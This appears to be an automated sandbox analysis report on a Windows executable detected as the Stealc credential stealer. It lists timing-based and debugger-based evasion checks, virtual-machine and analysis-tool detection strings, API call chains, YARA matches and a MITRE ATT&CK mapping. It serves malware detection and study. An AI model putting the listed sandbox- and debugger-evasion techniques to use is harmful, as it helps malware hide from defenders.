              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7BED7 second address: B7BF08 instructions: 0x00000000 rdtsc 0x00000002 ja 00007FB10CBE428Eh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d je 00007FB10CBE4286h 0x00000013 ja 00007FB10CBE4286h 0x00000019 jmp 00007FB10CBE428Fh 0x0000001e popad 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7BF08 second address: B7BF0E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7BF0E second address: B7BF14 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7BD2E second address: B7BD3C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 je 00007FB10CD320F6h 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7BD3C second address: B7BD40 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7BD40 second address: B7BD46 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B7E4FA second address: B7E531 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FB10CBE4286h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FB10CBE428Bh 0x0000000f push esi 0x00000010 jmp 00007FB10CBE4299h 0x00000015 pop esi 0x00000016 popad 0x00000017 push edi 0x00000018 pushad 0x00000019 pushad 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8CA88 second address: B8CAA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 jmp 00007FB10CD320FDh 0x0000000a push eax 0x0000000b push edx 0x0000000c jp 00007FB10CD320F6h 0x00000012 pushad 0x00000013 popad 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: B8CAA4 second address: B8CAB7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007FB10CBE4286h 0x00000008 jns 00007FB10CBE4286h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA38E0 second address: BA38E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3A20 second address: BA3A26 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3A26 second address: BA3A44 instructions: 0x00000000 rdtsc 0x00000002 jl 00007FB10CD320F6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b jnc 00007FB10CD320F6h 0x00000011 je 00007FB10CD320F6h 0x00000017 jnc 00007FB10CD320F6h 0x0000001d popad 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3A44 second address: BA3A56 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE428Bh 0x00000007 push esi 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3B8C second address: BA3B94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA3D05 second address: BA3D09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA576E second address: BA5779 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007FB10CD320F6h 0x0000000a popad 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA5779 second address: BA57A3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CBE4296h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FB10CBE428Eh 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA57A3 second address: BA57A9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA57A9 second address: BA57AD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA6E3C second address: BA6E46 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FB10CD320F6h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: BA9C2F second address: BA9C35 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA03E0 second address: 4BA0405 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FB10CD32101h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FB10CD320FDh 0x00000011 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA0405 second address: 4BA043D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov bl, 56h 0x00000005 movzx ecx, di 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c jmp 00007FB10CBE4292h 0x00000011 xchg eax, ebp 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FB10CBE4297h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4BA043D second address: 4BA0444 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA5C0 second address: ABA5C6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA924 second address: ABA928 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ABA928 second address: ABA92E instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Tries to evade debugger and weak emulator (self modifying code)
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 90F8DB instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: AADFC5 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 90D6A6 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: 90F9D8 instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeSpecial instruction interceptor: First address: B38FAD instructions caused by: Self-modifying code
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\0000 name: DriverDescJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: SystemBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeRegistry key queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System name: VideoBiosVersionJump to behavior
              Source: C:\Users\user\Desktop\file.exeEvaded block: after key decisiongraph_0-26972
              Source: C:\Users\user\Desktop\file.exeEvasive API call chain: GetSystemTime,DecisionNodesgraph_0-25790
              Source: C:\Users\user\Desktop\file.exeAPI coverage: 4.7 %
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D18A0 lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006D18A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D3910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,DeleteFileA,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006D3910
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D1269 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006D1269
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D1250 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006D1250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DE210 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006DE210
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D4B29 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006D4B29
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D4B10 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006D4B10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DCBE0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,CreateFileA,GetFileSizeEx,CloseHandle,CloseHandle,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006DCBE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D23A9 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006D23A9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CDB80 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,GetFileAttributesA,StrCmpCA,lstrcpy,CopyFileA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006CDB80
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006CDB99 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,StrCmpCA,StrCmpCA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcpy,DeleteFileA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006CDB99
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006D2390 lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,StrCmpCA,lstrlen,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrcpy,lstrcpy,lstrcpy,FindNextFileA,0_2_006D2390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DDD30 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,lstrcpy,0_2_006DDD30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006DD530 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcpy,lstrcpy,FindNextFileA,FindClose,0_2_006DD530
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C16A0 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,GetFileAttributesA,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrcpy,CopyFileA,lstrcpy,lstrcpy,DeleteFileA,FindNextFileA,FindClose,0_2_006C16A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C16B9 lstrcpy,lstrcpy,lstrcpy,lstrcat,lstrcpy,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,FindFirstFileA,0_2_006C16B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E1BF0 lstrcpy,ExitProcess,GetSystemInfo,ExitProcess,GetUserDefaultLangID,ExitProcess,ExitProcess,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrlen,lstrcpy,lstrcat,lstrcpy,OpenEventA,CloseHandle,Sleep,OpenEventA,CreateEventA,CloseHandle,ExitProcess,0_2_006E1BF0
              Source: file.exe, file.exe, 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: HARDWARE\ACPI\DSDT\VBOX__
              Source: file.exe, 00000000.00000002.2222214050.0000000000F45000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2222214050.0000000000F79000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2222214050.0000000000F4E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
              Source: file.exe, 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: VMwareVMware
              Source: file.exe, 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: Restart now?\\.\Oreans.vxd%s\Oreans.vxdXprotEventHARDWARE\ACPI\DSDT\VBOX__SeShutdownPrivilegeSoftware\WinLicenseCreateEvent API Error while extraction the driverGetEnvironmentVariable API Error while extraction the driverOpenSCManager API Error while extraction the driverCreateService API Error while extraction the driverCloseServiceHandle API Error while extraction the driverOpenService API Error while extraction the driverStartService API Error while extraction the driverAPIC error: Cannot find Processors Control Blocks. Please,
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25777
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25785
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25630
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25673
              Source: C:\Users\user\Desktop\file.exeAPI call chain: ExitProcess graph end nodegraph_0-25649
              Source: C:\Users\user\Desktop\file.exeSystem information queried: ModuleInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess information queried: ProcessInformationJump to behavior

              Anti Debugging

              barindex
              Hides threads from debuggers
              Source: C:\Users\user\Desktop\file.exeThread information set: HideFromDebuggerJump to behavior
              Tries to detect sandboxes and other dynamic analysis tools (window names)
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: regmonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: gbdyllo
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: process monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: procmon_window_class
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: registry monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: ollydbg
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: filemonclass
              Source: C:\Users\user\Desktop\file.exeOpen window title or class name: file monitor - sysinternals: www.sysinternals.com
              Source: C:\Users\user\Desktop\file.exeFile opened: NTICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SICE
              Source: C:\Users\user\Desktop\file.exeFile opened: SIWVID
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeProcess queried: DebugPortJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006C4A60 VirtualProtect 00000000,00000004,00000100,?0_2_006C4A60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E6390 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006E6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E6390 mov eax, dword ptr fs:[00000030h]0_2_006E6390
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_006E2A40
              Source: all processesThread injection, dropped files, key value created, disk infection and DNS query: no activity detected
              Source: C:\Users\user\Desktop\file.exeMemory protected: page guardJump to behavior

              HIPS / PFW / Operating System Protection Evasion

              barindex
              Yara detected Powershell download and execute
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3800, type: MEMORYSTR
              Searches for specific processes (likely to inject)
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E4610 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,Process32Next,CloseHandle,0_2_006E4610
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E46A0 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,OpenProcess,TerminateProcess,CloseHandle,Process32Next,CloseHandle,0_2_006E46A0
              Source: file.exe, file.exe, 00000000.00000002.2221685809.0000000000A90000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: na:Program Manager
              Source: C:\Users\user\Desktop\file.exeCode function: GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,LocalFree,0_2_006E2D60
              Source: C:\Users\user\Desktop\file.exeQueries volume information: C:\ VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E2B60 GetProcessHeap,RtlAllocateHeap,GetLocalTime,wsprintfA,0_2_006E2B60
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E2A40 GetProcessHeap,RtlAllocateHeap,GetUserNameA,0_2_006E2A40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_006E2C10 GetProcessHeap,RtlAllocateHeap,GetTimeZoneInformation,wsprintfA,0_2_006E2C10

              Stealing of Sensitive Information

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2181065065.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3800, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Remote Access Functionality

              barindex
              Yara detected Stealc
              Source: Yara matchFile source: 00000000.00000002.2221503288.00000000006C1000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000003.2181065065.0000000004A10000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2222214050.0000000000EFE000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 3800, type: MEMORYSTR
              Source: Yara matchFile source: dump.pcap, type: PCAP

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid Accounts2
              Command and Scripting Interpreter              		1
              Create Account              		11
              Process Injection              		1
              Masquerading              		OS Credential Dumping2
              System Time Discovery              		Remote Services1
              Archive Collected Data              		2
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault Accounts13
              Native API              		1
              DLL Side-Loading              		1
              DLL Side-Loading              		33
              Virtualization/Sandbox Evasion              		LSASS Memory641
